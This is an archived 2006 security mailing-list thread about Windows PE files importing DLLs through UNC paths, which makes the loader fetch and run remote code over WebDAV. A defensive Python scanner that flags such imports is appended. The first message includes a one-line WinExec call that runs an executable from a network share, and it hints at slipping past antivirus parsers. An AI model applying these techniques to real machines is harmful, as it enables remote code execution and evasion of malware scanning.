>
> ------------------------------
>
> Message: 2
> Date: Tue, 7 Nov 2006 02:59:10 -0800
> From: Solar Eclipse <solareclipse@xxxxxxxxxxxx>
> Subject: [Dailydave] UNC imports in PE files
> To: dailydave@xxxxxxxxxxxxxxxxxxxxx
> Message-ID:
> <20061107105910.GA19579@xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx>
> Content-Type: text/plain; charset="us-ascii"
>
> Hello list,
>
> Most of you probably know that the WebDAV redirector in Windows XP tries to
> resolve UNC paths from all applications with WebDAV requests on port 80. This
> means that instead of calling URLDownloadToFile("http://192.168.0.1/foo.exe")
> and then WinExec, you can do just WinExec("\\192.168.0.1\foo.exe")
>
> What you probably don't know is that you can use a full UNC path instead of a
> DLL name in the import section of a PE file. When the file is executed, the
> loader will try to access the imported DLL using the UNC path and the WebDAV
> redirector will download the DLL from the Internet.
>
> It is getting increasingly harder to draw (and defend) the boundaries between
> the local machine, the local network and the Internet.
>
> Check out http://www.phreedom.org/solar/code/tinype/ for the source code of a
> 137 byte PE file that downloads a DLL over WebDAV and executes the payload in
> its DllMain function. The PE file doesn't even have to contain any code,
> because DllMain is executed before the entry point of the executable.
>
> The page also has detailed information about hacking the PE header and building
> the smallest possible PE file that can be executed on Windows. Its size is only
> 97 bytes.
>
> If anybody is really bored, feel free to check how many anti-virus products
> have PE parsers that don't handle the header of the 97 byte PE file properly
> and fail to unpack and scan the code in the file.
>
>
> Good night and good luck,
> Solar Eclipse
>
> ------------------------------
>
>
> ------------------------------
>
> Message: 7
> Date: Wed, 8 Nov 2006 13:57:16 +0000
> From: Barrie Dempster <barrie@xxxxxxxxxxxxxxxx>
> Subject: Re: [Dailydave] UNC imports in PE files
> To: dailydave@xxxxxxxxxxxxxxxxxxxxx
> Message-ID: <200611081357.35854.barrie@xxxxxxxxxxxxxxxx>
> Content-Type: text/plain; charset="iso-8859-15"
>
> On Tuesday 07 November 2006 10:59, Solar Eclipse wrote:
> <snip>
> > What you probably don't know is that you can use a full UNC path instead of
> > a DLL name in the import section of a PE file. When the file is executed,
> > the loader will try to access the imported DLL using the UNC path and the
> > WebDAV redirector will download the DLL from the Internet.
>
>
> Whilst using this technique to decrease PE size is quite interesting, I'd be
> willing to bet most here would already be aware of the redirector
> functionality when loading DLLs, as it was pointed out by Dave Litchfield
> over a year ago.
>
> www.ngssoftware.com/papers/xpms.pdf
>
> --
> With Regards..
> Barrie Dempster (zeedo) - Fortiter et Strenue
>
> - http://reboot-robot.net -
>
> "He who hingeth aboot, geteth hee-haw" Victor - Still Game
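
The loader behaviour described in the first message gives defenders something concrete to check for: an import descriptor whose module name is a path rather than a bare file name. The following is an added example, not code from the thread or from the linked tinype page; the function names, the 4096-descriptor and 260-byte bounds, the "any path separator" heuristic and the constructed sample image (with a documentation-range address) are assumptions of this example.

```python
import struct

def _off(rva, secs):
    """RVA -> file offset; RVAs outside every section are read 1:1 (header data)."""
    for vsize, va, rsize, rptr in secs:
        if va <= rva < va + max(vsize, rsize):
            return rptr + rva - va
    return rva

def import_dll_names(data):
    """Return the module name strings from the PE import directory."""
    pe, = struct.unpack_from("<I", data, 0x3C)                  # e_lfanew
    if data[:2] != b"MZ" or data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    _, nsec, _, _, _, optsz = struct.unpack_from("<HHIIIH", data, pe + 4)
    magic, = struct.unpack_from("<H", data, pe + 24)            # optional header
    dirs = pe + 24 + (112 if magic == 0x20B else 96)            # PE32+ / PE32
    ndirs, _, _, imp_rva = struct.unpack_from("<4I", data, dirs - 4)
    if ndirs < 2 or not imp_rva:                                # no import directory
        return []
    secs = [struct.unpack_from("<4I", data, pe + 24 + optsz + 40 * i + 8) for i in range(nsec)]
    names, d = [], _off(imp_rva, secs)
    while d + 20 <= len(data) and len(names) < 4096:            # bound hostile tables
        name_rva, first_thunk = struct.unpack_from("<II", data, d + 12)
        if not name_rva or not first_thunk:                     # terminator descriptor
            break
        s = _off(name_rva, secs)
        names.append(data[s:s + 260].split(b"\0")[0].decode("latin-1"))
        d += 20
    return names

def path_like_imports(data):
    """Assumption of this example: normal imports are bare file names."""
    return [n for n in import_dll_names(data) if "\\" in n or "/" in n]

def sample_image(names):
    """Constructed, non-loadable PE32 skeleton: headers + one import section."""
    h, body = bytearray(0x200), bytearray(0x200)
    h[:2], h[0x3C], h[0x40:0x44] = b"MZ", 0x40, b"PE\0\0"
    struct.pack_into("<HH", h, 0x44, 0x14C, 1)                  # machine, 1 section
    struct.pack_into("<HHH", h, 0x54, 224, 0x102, 0x10B)        # opt size, flags, magic
    struct.pack_into("<4I", h, 0x58 + 92, 16, 0, 0, 0x1000)     # dir count, import RVA
    struct.pack_into("<8s4I", h, 0x58 + 224, b".idata", 0x200, 0x1000, 0x200, 0x200)
    pos = 20 * (len(names) + 1)                                 # names follow descriptors
    for i, n in enumerate(names):
        struct.pack_into("<II", body, 20 * i + 12, 0x1000 + pos, 0x1000 + pos)
        body[pos:pos + len(n)] = n
        pos += len(n) + 1
    return bytes(h + body)
```

To scan a file on disk, pass its bytes to `path_like_imports` and treat any non-empty result as worth a closer look.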